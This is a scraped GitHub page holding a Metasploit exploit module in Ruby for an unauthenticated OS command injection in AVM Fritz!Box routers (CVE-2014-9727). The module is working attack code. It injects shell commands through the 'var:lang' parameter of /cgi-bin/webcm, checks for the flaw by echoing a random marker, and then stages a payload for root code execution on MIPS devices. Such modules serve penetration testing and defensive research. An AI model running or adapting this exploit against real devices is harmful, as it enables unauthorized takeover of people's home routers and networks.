Permalink
Join GitHub today
GitHub is home to over 50 million developers working together to host and review code, manage projects, and build software together.
Sign up
These are based on cross references by EDB, OSVDB, module short name, blog post and BID.
| ## | |
| # This module requires Metasploit: https://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| class MetasploitModule < Msf::Exploit::Remote | |
| Rank = ExcellentRanking | |
| include Msf::Exploit::Remote::HttpClient | |
| include Msf::Exploit::CmdStager | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'Fritz!Box Webcm Unauthenticated Command Injection', | |
| 'Description' => %q{ | |
| Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection. | |
| This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the | |
| following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270, | |
| 7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE, | |
| 6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270 | |
| }, | |
| 'Author' => | |
| [ | |
| 'Unknown', # Vulnerability discovery | |
| 'Fabian Braeunlein <fabian[at]breaking.systems>', # Metasploit PoC with wget method | |
| 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module | |
| ], | |
| 'License' => MSF_LICENSE, | |
| 'References' => | |
| [ | |
| [ 'CVE', '2014-9727' ], | |
| [ 'OSVDB', '103289' ], | |
| [ 'BID', '65520' ], | |
| [ 'URL', 'http://www.kapple.de/?p=75' ], # vulnerability details with PoC | |
| [ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], # probably the first published details (now censored) | |
| [ 'URL', 'http://pastebin.com/GnMKGmZ2' ], # published details uncensored from speckmarschall | |
| [ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], # vendor site with a list of vulnerable devices | |
| [ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] # writeup with PoC | |
| ], | |
| 'DisclosureDate' => 'Feb 11 2014', | |
| 'Privileged' => true, | |
| 'Payload' => | |
| { | |
| 'DisableNops' => true | |
| }, | |
| 'Targets' => | |
| [ | |
| [ 'MIPS Little Endian', | |
| { | |
| 'Platform' => 'linux', | |
| 'Arch' => ARCH_MIPSLE | |
| } | |
| ], | |
| [ 'MIPS Big Endian', | |
| { | |
| 'Platform' => 'linux', | |
| 'Arch' => ARCH_MIPSBE | |
| } | |
| ], | |
| ], | |
| 'DefaultTarget' => 0 | |
| )) | |
| deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') | |
| end | |
| def check | |
| begin | |
| clue = Rex::Text::rand_text_alpha(rand(5) + 5) | |
| res = send_request_cgi({ | |
| 'uri' => '/cgi-bin/webcm', | |
| 'method' => 'GET', | |
| 'vars_get' => { | |
| "var:lang" => "&echo -e \"\\n\\n#{clue}\"" | |
| } | |
| }) | |
| if res && res.body =~ /#{clue}/ | |
| return Exploit::CheckCode::Vulnerable | |
| end | |
| rescue ::Rex::ConnectionError | |
| return Exploit::CheckCode::Unknown | |
| end | |
| Exploit::CheckCode::Safe | |
| end | |
| def execute_command(cmd, opts) | |
| begin | |
| res = send_request_cgi({ | |
| 'uri' => '/cgi-bin/webcm', | |
| 'method' => 'GET', | |
| 'vars_get' => { | |
| "var:lang" => "&#{cmd}", | |
| } | |
| }) | |
| return res | |
| rescue ::Rex::ConnectionError | |
| fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") | |
| end | |
| end | |
| def exploit | |
| print_status("Trying to access the vulnerable URL...") | |
| unless check == Exploit::CheckCode::Vulnerable | |
| fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") | |
| end | |
| print_status("Exploiting...") | |
| execute_cmdstager( | |
| flavor: :echo, | |
| linemax: 92 | |
| ) | |
| end | |
| end |